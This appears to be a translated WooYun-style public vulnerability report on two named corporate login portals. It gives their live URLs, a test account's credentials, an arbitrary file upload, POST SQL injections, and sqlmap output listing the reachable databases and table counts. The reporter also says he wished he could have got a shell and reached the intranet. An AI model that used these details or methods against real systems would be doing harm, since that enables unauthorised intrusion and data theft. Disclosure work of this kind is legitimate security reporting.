2015-10-15: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly.
2015-11-29: The vendor has proactively ignored the vulnerability; details disclosed to the public.
http://srm.eebbk.com:85/ is a supplier login system. After registering an account, I found an arbitrary file upload that writes to D:\upload\PreVendorProcessFlowDiagramFile\, but the upload location is not under the web root, so it cannot be exploited. Test account: 123456a / 123456a. After logging in, a query revealed a POST injection.

http://srv.okii.com:8015/Login.aspx, the after-sales service center login, has a POST injection; 20 databases are reachable through it, with tens of millions of rows, a huge volume of data. This is a big vendor. Pity I could not break through the upload to get a shell and reach the intranet.
Database: SRMADMIN [518 tables]
[10:34:34] [INFO] fetched data logged to text files under 'C:\Users\KING\.sqlmap\output\srm.eebbk.com'
available databases [20]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] INFOCENTER
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SCOTT
[*] SRMADMIN
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB
Information from the first injection point
available databases [19]:
[*] APEX_030200
[*] APPQOSSYS
[*] APPS
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB
[11:01:30] [INFO] fetched data logged to text files under 'C:\Users\KING\.sqlmap\output\srv.okii.com'
Database: APPS [325 tables]
[11:07:31] [INFO] fetched data logged to text files under 'C:\Users\KING\.sqlmap\output\srv.okii.com'
Information involved in the second injection point
Could not reach the vendor, or the vendor actively refused.
Vulnerability Rank: 15 (WooYun rating)